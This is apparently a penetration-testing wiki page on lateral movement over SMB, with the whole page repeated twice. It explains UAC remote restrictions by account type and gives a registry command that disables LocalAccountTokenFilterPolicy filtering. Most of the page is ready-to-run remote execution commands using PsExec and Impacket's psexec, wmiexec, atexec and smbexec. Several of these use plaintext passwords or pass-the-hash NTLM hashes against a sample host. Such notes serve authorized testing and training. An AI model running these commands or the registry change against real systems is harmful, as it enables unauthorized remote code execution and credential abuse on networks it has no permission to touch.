SMB protocol

This page deals with lateral movement using smb protocol.

Introduction

Lateral movement consists of techniques that enable an attacker to access and control remote systems. SMB protocol is a well known candidate for this purpose.

Requirements

Definitions

There are 5 types of users:

Local users
- With admin privileges on the machine
  - RID500
  - Non-RID500
- Without admin privileges on the machine
Domain users
- With admin privileges on machines
- Without admin privileges on machines

RID500 is the built-in local admin account used for installing or recovering purpose (usually named Administrator).

UAC remote restrictions

Local admin privileges are required to WmiExec or PsExec
Non-RID 500 local admin accounts cannot WmiExec or PsExec on WinVista+ machines
Domain users with admin privileges on machine can
RID 500 local admin account can WmiExec or PsExec on machines

PsExec, WmiExec, SmbExec, AtExec, etc.

Local users

Local admins

Local admin RID 500

Yes

Domain users without local admin privileges

Domain users with local admin privileges

Yes

To allow Non-RID 500 local admin accounts performing Wmi or PsExec, execute:

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /f /d 1

To prevent RID 500 from being able to WmiExec or PsExec, execute:

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken /t REG_DWORD /f /d 1

Tools

PsExec

On Windows, use Sysinternal's PsExec:

PsExec64.exe \\WIN01 -accepteula -s -u localadmin -p L0c4l4dm1n "cmd"
PsExec64.exe \\192.168.10.60 -accepteula -s -u localadmin -p b26906d7457cbe74931011c3c5d1ac92 "cmd"

On Kali, use Impacket's PsExec:

psexec.py ./localadmin:L0c4l4dm1n@192.168.10.60 "cmd"
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 ./aasadmin@192.168.10.60 "cmd"

WmiExec

On Kali, use Impacket's WmiExec:

wmiexec.py ./localadmin:L0c4l4dm1n@192.168.10.60 "ipconfig"
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 ./aasadmin@192.168.10.60 "ipconfig"

AtExec

On Kali, use Impacket's AtExec:

atexec.py ./localadmin:L0c4l4dm1n@192.168.10.60 "ipconfig"
atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 ./aasadmin@192.168.10.60 "ipconfig"

SmbExec

On Kali, use Impacket's SmbExec:

smbexec.py ./localadmin:L0c4l4dm1n@192.168.10.60
smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 ./aasadmin@192.168.10.60

References

PreviousLateral Movement

Last updated 5 years ago

SMB protocol

This page deals with lateral movement using smb protocol.

Introduction

Lateral movement consists of techniques that enable an attacker to access and control remote systems. SMB protocol is a well known candidate for this purpose.

Requirements

Definitions

There are 5 types of users:

Local users
- With admin privileges on the machine
  - RID500
  - Non-RID500
- Without admin privileges on the machine
Domain users
- With admin privileges on machines
- Without admin privileges on machines

RID500 is the built-in local admin account used for installing or recovering purpose (usually named Administrator).

UAC remote restrictions

Judging from and , we can say following things:

Local admin privileges are required to WmiExec or PsExec
Non-RID 500 local admin accounts cannot WmiExec or PsExec on WinVista+ machines
Domain users with admin privileges on machine can
RID 500 local admin account can WmiExec or PsExec on machines

PsExec, WmiExec, SmbExec, AtExec, etc.

Local users

Local admins

Local admin RID 500

Yes

Domain users without local admin privileges

Domain users with local admin privileges

Yes

To allow Non-RID 500 local admin accounts performing Wmi or PsExec, execute:

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /f /d 1

To prevent RID 500 from being able to WmiExec or PsExec, execute:

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken /t REG_DWORD /f /d 1

Tools

PsExec

On Windows, use Sysinternal's PsExec:

PsExec64.exe \\WIN01 -accepteula -s -u localadmin -p L0c4l4dm1n "cmd"
PsExec64.exe \\192.168.10.60 -accepteula -s -u localadmin -p b26906d7457cbe74931011c3c5d1ac92 "cmd"

On Kali, use Impacket's PsExec:

psexec.py ./localadmin:L0c4l4dm1n@192.168.10.60 "cmd"
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 ./aasadmin@192.168.10.60 "cmd"

WmiExec

On Kali, use Impacket's WmiExec:

wmiexec.py ./localadmin:L0c4l4dm1n@192.168.10.60 "ipconfig"
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 ./aasadmin@192.168.10.60 "ipconfig"

AtExec

On Kali, use Impacket's AtExec:

atexec.py ./localadmin:L0c4l4dm1n@192.168.10.60 "ipconfig"
atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 ./aasadmin@192.168.10.60 "ipconfig"

SmbExec

On Kali, use Impacket's SmbExec:

smbexec.py ./localadmin:L0c4l4dm1n@192.168.10.60
smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 ./aasadmin@192.168.10.60

References

PreviousLateral Movement

Last updated 5 years ago